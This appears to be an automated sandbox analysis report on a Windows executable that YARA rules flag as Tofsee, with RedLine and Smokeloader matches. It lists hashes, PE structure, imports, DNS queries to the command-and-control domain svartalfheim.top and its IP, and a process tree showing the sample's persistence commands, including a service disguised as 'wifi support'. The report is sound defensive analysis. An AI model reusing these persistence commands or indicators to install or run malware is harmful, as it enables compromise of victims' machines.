                                                                              MD5:ECA63CBE24540409B8D7D26006AFC7E9
                                                                              SHA1:E68668D56F8DE0B218AB8CE1CAEDAB67738758F5
                                                                              SHA-256:C335F94E1135F05A7C9C43DE5836BDBE27F2E434F787D9FC0009F5FAEA226B57
                                                                              SHA-512:C0181EA0EE254E387F50B9526BAF3241AF700955588AC99FBE12105B9D40EFB857CD981C8BF533C6CF777AFF0DFFD62873601A3D2EA9FA96804758436E12F50F
                                                                              Malicious:false
                                                                               Preview: (binary ETL trace header; readable embedded UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, ECCB175F-1EB2-43DA-BFB5-A8D58A40A4D7, C:\Windows\logs\waasmedic\waasmedic.20230208_040427_786.etl, 17134.1.amd64fre.rs4_release.180410-1804, WaaSMedicSvc.pdb)
                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):10874
                                                                              Entropy (8bit):3.1639573047664586
                                                                              Encrypted:false
                                                                              SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJf+k:j+s+v+b+P+m+0+Q+q+q+73+zB+k
                                                                              MD5:0B770DFFF3F665694BF6BF00027A9FBD
                                                                              SHA1:6012FF2CF0F996B044312A974D75656DCBED702D
                                                                              SHA-256:3B7BA89B0A8AD80E3BEF0616DFF905DA9A50608933FAFC2B76DA22A4B610B6B6
                                                                              SHA-512:A151849ADB59ED84FA413787466E05EA042C7269383B4E24AEB0F4E74E43F4EC33324F90459ACD1BED6ACD30A3F9036D886360480697C24F1EB5A616D1012D08
                                                                              Malicious:false
                                                                               Preview (UTF-16 text decoded, CRLF line breaks restored):
                                                                               -------------------------------------------------------------------------------------
                                                                               MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                Start Time: Thu Jun 27 2019 01:29:49
                                                                               
                                                                               MpEnsureProcessMitigationPolicy: hr = 0x1
                                                                               WDEnable
                                                                               ERROR: MpWDEnable(TRUE) failed (800704EC)
                                                                               MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
                                                                               -------------------------------------------------------------------------------------
                                                                               
                                                                               -------------------------------------------------------------------------------------
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):3.3870081431882535
                                                                              Encrypted:false
                                                                              SSDEEP:96:oC/2o+oa5Q+97/YzWC9/I2lfikm/441T2IjFzdNMCn6JROY5Y:7uRjuu2g9CC4q
                                                                              MD5:703B2EA8C4DAFDC027C9C239FD4E6F41
                                                                              SHA1:5F826A311D1DA602C058515822326D2DC4B19540
                                                                              SHA-256:13529537165F17E8C7916312AAE8444F013F69CA50F9C5FCBF04539B7085417E
                                                                              SHA-512:31941279367ED33D22B2A84F1E906D263E2DEA3C03C0961962A428957CBD7516AEAFF16EC6A90C35D5600C13B80A98A3355E619BA6AFB2284F888FAA1507709A
                                                                              Malicious:false
                                                                               Preview: (binary ETL trace header; readable embedded UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, 8696EAC4-1288-4288-A4EE-49EE431B0AD9, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20230208_040419_207.etl)
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):12343296
                                                                              Entropy (8bit):3.4208454596549234
                                                                              Encrypted:false
                                                                              SSDEEP:6144:4JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:4JMjbyM3DW8qQa5TsV
                                                                              MD5:D83D3102AEE8419201BF810DE2A41992
                                                                              SHA1:30EC9FD8B35C5FEC5366FE52C7BF77E57A0C67A2
                                                                              SHA-256:4F8B000276DE586232FC912CDB72B497C305E8E13A8DEF72D3A2B0BA2FB7E0C9
                                                                              SHA-512:F3E9CEF20B8751716F1426DCACDA675F2672F60FF55218CB4A9BEC141A736D2B12E8761BCFC7115CD5F46DF3E5A83F3D399BD110EF37000F31EAEABDAE3BDCA2
                                                                              Malicious:true
                                                                               Preview: (PE32 image header; readable strings: MZ stub "This program cannot be run in DOS mode", Rich header, PE signature, section names .text, .data, .rsrc, .reloc)
                                                                              Process:C:\Windows\SysWOW64\netsh.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):3773
                                                                              Entropy (8bit):4.7109073551842435
                                                                              Encrypted:false
                                                                              SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                              MD5:DA3247A302D70819F10BCEEBAF400503
                                                                              SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                              SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                              SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                              Malicious:false
                                                                               Preview (CRLF line breaks restored; output truncated in the report):
                                                                               A specified value is not valid.
                                                                               
                                                                               Usage: add rule name=<string>
                                                                                     dir=in|out
                                                                                     action=allow|block|bypass
                                                                                     [program=<program path>]
                                                                                     [service=<service short name>|any]
                                                                                     [description=<string>]
                                                                                     [enable=yes|no (default=yes)]
                                                                                     [profile=public|private|domain|any[,...]]
                                                                                     [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
                                                                                     [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|
                                                                                        <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
                                                                                     [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)]
                                                                                     [remoteport=0-65535|<port range>[,...]|any (default=any)]
                                                                                     [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|
                                                                                        tcp|udp|any (default=any)]
                                                                                     [interfacetype=wireless|lan|ras|any]
                                                                                     [rmtcomputergrp=<SDDL string>]
                                                                                     [rmtusrgrp=<SDDL string>]
                                                                                     [edge=yes|deferapp|deferuser|no (default=no)]
                                                                                     [security=authenticate|authenc|authdynenc|authnoencap|
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.033590531786374
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:198656
                                                                              MD5:546a040e4479958f7c6b862dead9a269
                                                                              SHA1:69a99c8f2fbfc316140690be348d6b54d6c01d7d
                                                                              SHA256:229d8701db31564e7eccab699121e96fe75d70896daa87323e9c59da3be74be0
                                                                              SHA512:459623eced397b36d3bbb5fa01d78789a172f16c72bffaa58f7ffda59ce3378f2c5a4c8e4c7f1a3864ac6469c0c3e51b5cab21ed10f22d2c379e5bb893a84f0b
                                                                              SSDEEP:6144:1JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:1JMjbyM3DW8qQa5TsV
                                                                              TLSH:8F14CF323A90C072C17B15745C64DAA56BBEB83046B9C9BB776807BE4F306D1523A37B
                                                                               File Content Preview: (PE32 image header; readable strings: MZ stub "This program cannot be run in DOS mode", Rich header, PE signature; preview truncated in the report)
                                                                              Icon Hash:70d0eeeacacaeadd
                                                                              Entrypoint:0x40726f
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x61B896C8 [Tue Dec 14 13:06:16 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:87e1f4e32d01d5a52e605f27fd138118
                                                                              Instruction
                                                                              call 00007F13A86C951Ch
                                                                              jmp 00007F13A86C2E8Eh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              test ecx, 00000003h
                                                                              je 00007F13A86C3036h
                                                                              mov al, byte ptr [ecx]
                                                                              add ecx, 01h
                                                                              test al, al
                                                                              je 00007F13A86C3060h
                                                                              test ecx, 00000003h
                                                                              jne 00007F13A86C3001h
                                                                              add eax, 00000000h
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              lea esp, dword ptr [esp+00000000h]
                                                                              mov eax, dword ptr [ecx]
                                                                              mov edx, 7EFEFEFFh
                                                                              add edx, eax
                                                                              xor eax, FFFFFFFFh
                                                                              xor eax, edx
                                                                              add ecx, 04h
                                                                              test eax, 81010100h
                                                                              je 00007F13A86C2FFAh
                                                                              mov eax, dword ptr [ecx-04h]
                                                                              test al, al
                                                                              je 00007F13A86C3044h
                                                                              test ah, ah
                                                                              je 00007F13A86C3036h
                                                                              test eax, 00FF0000h
                                                                              je 00007F13A86C3025h
                                                                              test eax, FF000000h
                                                                              je 00007F13A86C3014h
                                                                              jmp 00007F13A86C2FDFh
                                                                              lea eax, dword ptr [ecx-01h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-02h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-03h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              lea eax, dword ptr [ecx-04h]
                                                                              mov ecx, dword ptr [esp+04h]
                                                                              sub eax, ecx
                                                                              ret
                                                                              cmp ecx, dword ptr [0042C320h]
                                                                              jne 00007F13A86C3014h
                                                                              rep ret
                                                                              jmp 00007F13A86C950Ch
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0042C320h]
                                                                              Programming Language:
                                                                              • [ASM] VS2008 build 21022
                                                                              • [ C ] VS2008 build 21022
                                                                              • [IMP] VS2005 build 50727
                                                                              • [C++] VS2008 build 21022
                                                                              • [RES] VS2008 build 21022
                                                                              • [LNK] VS2008 build 21022
                                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1876c | 0x50 | .text
                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x15a000 | 0x1ee8 | .rsrc
                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15c000 | 0xf10 | .reloc
                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1240 | 0x1c | .text
                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3970 | 0x40 | .text
                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1f4 | .text
                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                               .text | 0x1000 | 0x1831a | 0x18400 | False | 0.5320050740979382 | data | 6.368267998766109 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                               .data | 0x1a000 | 0x13f430 | 0x13800 | False | 0.9405548878205128 | data | 7.828510878154685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .rsrc | 0x15a000 | 0x1ee8 | 0x2000 | False | 0.6080322265625 | data | 5.762900764852552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                               .reloc | 0x15c000 | 0x276e | 0x2800 | False | 0.32080078125 | data | 3.3362844081949086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                               Name | RVA | Size | Type | Language | Country
                                                                               RT_ICON | 0x15a1c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tibetan | Tibet
                                                                               RT_ICON | 0x15a1c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tibetan | Nepal
                                                                               RT_ICON | 0x15a1c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tibetan | India
                                                                               RT_ICON | 0x15aa68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tibetan | Tibet
                                                                               RT_ICON | 0x15aa68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tibetan | Nepal
                                                                               RT_ICON | 0x15aa68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tibetan | India
                                                                               RT_STRING | 0x15bd90 | 0x4e | data | Tibetan | Tibet
                                                                               RT_STRING | 0x15bd90 | 0x4e | data | Tibetan | Nepal
                                                                               RT_STRING | 0x15bd90 | 0x4e | data | Tibetan | India
                                                                               RT_STRING | 0x15bde0 | 0x50 | data | Tibetan | Tibet
                                                                               RT_STRING | 0x15bde0 | 0x50 | data | Tibetan | Nepal
                                                                               RT_STRING | 0x15bde0 | 0x50 | data | Tibetan | India
                                                                               RT_STRING | 0x15be30 | 0xb6 | data | Tibetan | Tibet
                                                                               RT_STRING | 0x15be30 | 0xb6 | data | Tibetan | Nepal
                                                                               RT_STRING | 0x15be30 | 0xb6 | data | Tibetan | India
                                                                               RT_GROUP_ICON | 0x15bb10 | 0x22 | data | Tibetan | Tibet
                                                                               RT_GROUP_ICON | 0x15bb10 | 0x22 | data | Tibetan | Nepal
                                                                               RT_GROUP_ICON | 0x15bb10 | 0x22 | data | Tibetan | India
                                                                               RT_VERSION | 0x15bb38 | 0x258 | data | |
DLL | Imports
KERNEL32.dll | RequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
USER32.dll | GetComboBoxInfo
GDI32.dll | GetTextFaceW
Language of compilation system | Country where language is spoken | Map
Tibetan | Tibet |
Tibetan | Nepal |
Tibetan | India |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/07/23-20:05:14.210188 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 56924 | 53 | 192.168.2.3 | 8.8.8.8
02/07/23-20:04:33.939091 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 52387 | 53 | 192.168.2.3 | 8.8.8.8
02/07/23-20:05:54.726769 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 60625 | 53 | 192.168.2.3 | 8.8.8.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 7, 2023 20:04:31.258358002 CET | 192.168.2.3 | 8.8.8.8 | 0x9480 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:33.939090967 CET | 192.168.2.3 | 8.8.8.8 | 0xfd45 | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:05:14.210187912 CET | 192.168.2.3 | 8.8.8.8 | 0x9585 | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:05:54.726768970 CET | 192.168.2.3 | 8.8.8.8 | 0xc103 | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.241579056 CET | 192.168.2.3 | 8.8.8.8 | 0x64c0 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 7, 2023 20:04:31.288695097 CET | 8.8.8.8 | 192.168.2.3 | 0x9480 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:31.288695097 CET | 8.8.8.8 | 192.168.2.3 | 0x9480 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:31.288695097 CET | 8.8.8.8 | 192.168.2.3 | 0x9480 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.40.29 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:31.288695097 CET | 8.8.8.8 | 192.168.2.3 | 0x9480 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.2 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:31.288695097 CET | 8.8.8.8 | 192.168.2.3 | 0x9480 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:04:34.046056986 CET | 8.8.8.8 | 192.168.2.3 | 0xfd45 | No error (0) | svartalfheim.top | | 176.124.192.220 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:05:14.561336040 CET | 8.8.8.8 | 192.168.2.3 | 0x9585 | No error (0) | svartalfheim.top | | 176.124.192.220 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:05:55.066458941 CET | 8.8.8.8 | 192.168.2.3 | 0xc103 | No error (0) | svartalfheim.top | | 176.124.192.220 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.387082100 CET | 8.8.8.8 | 192.168.2.3 | 0x64c0 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.2 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.387082100 CET | 8.8.8.8 | 192.168.2.3 | 0x64c0 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.387082100 CET | 8.8.8.8 | 192.168.2.3 | 0x64c0 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.387082100 CET | 8.8.8.8 | 192.168.2.3 | 0x64c0 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001) | false
Feb 7, 2023 20:06:14.387082100 CET | 8.8.8.8 | 192.168.2.3 | 0x64c0 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.40.29 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 7, 2023 20:04:31.565531969 CET | 25 | 49703 | 104.47.54.36 | 192.168.2.3 | 220 DM3NAM06FT007.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Tue, 7 Feb 2023 19:04:30 +0000

                                                                              Target ID:0
                                                                              Start time:20:04:09
                                                                              Start date:07/02/2023
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                              Imagebase:0x400000
                                                                              File size:198656 bytes
                                                                              MD5 hash:546A040E4479958F7C6B862DEAD9A269
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low

                                                                              Target ID:1
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:2
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:3
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
                                                                              Imagebase:0xb0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:4
                                                                              Start time:20:04:17
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:5
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:6
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
                                                                              Imagebase:0xb0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:7
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:8
                                                                              Start time:20:04:18
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:9
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
